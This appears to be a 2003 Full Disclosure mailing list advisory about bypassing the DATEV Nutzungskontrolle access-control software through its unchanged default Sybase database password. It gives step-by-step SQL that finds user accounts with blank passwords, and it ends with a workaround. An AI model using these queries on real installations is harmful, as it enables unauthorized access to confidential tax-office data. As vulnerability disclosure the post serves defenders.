Full Disclosure mailing list archives
(no subject)
From: <t4rku5 () hushmail com>
Date: Fri, 31 Oct 2003 05:20:28 -0800
Topic: DATEV Nutzungskontrolle Bypassing Release Date: 2003-10-31 Affected system: ================ - Nutzungskontrolle V.2.2 - Nutzungskontrolle V.2.1 Unaffected system: ================== - none known Summary: ======== DATEV eG is a German Company, which makes Software for tax advisors and lawyers. The Nutzungskontrolle (NUKO) is a Software to restrict the access for the users. For example, a normal user is not allowed to see the internal reward accounting data. These data are restrictet by the NUKO by, for example, blocking the "advisor number", which is used for all data in the internal reward accounting. Issue: ====== It is possible to find out simple or blank passwords in the NUKO, by searching in the NUKO Database. The Problem is that DATEV changed the default database password for all their databases, except for the NUKO DB. At the moment the Sybase ASA Database is used to manage this stuff. I will not write the login password down here, because i think it is no problem to find this with google. 1. First you have to add the default superuser to the group DATEV: example: GRANT MEMBERSHIP IN GROUP DATEV TO "the superuser login" (without "") 2. Then just make a query to the table u_nkw_passwords for the colum nk_password to check where a password hash 3D7595A98BFF809D3D7595A98BFF809D3D7595A98BFF809D3D7595A98BFF809D is. example: select nk_user_id from u_nkw_passwords where nk_password = '3D7595A98BFF809D3D7595A98BFF809D3D7595A98BFF809D3D7595A98BFF809D' 3. Now query the user name of the nk_user_id. example: select nk_user_name from u_nkw_users where nk_user_id = 'one of the userid from 2.' 4. Now you have a NUKO login with a blank Password. Workaround: =========== Change the default database password. Credits: ======== Discovered by t4rku5 Concerned about your privacy? Follow this link to get FREE encrypted email: https://www.hushmail.com/?l=2 Free, ultra-private instant messaging with Hush Messenger https://www.hushmail.com/services.php?subloc=messenger&l=434 Promote security and make money with the Hushmail Affiliate Program: https://www.hushmail.com/about.php?subloc=affiliate&l=427 _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Current thread:
- (no subject) dilema (Oct 24)
- <Possible follow-ups>
- (no subject) t4rku5 (Oct 31)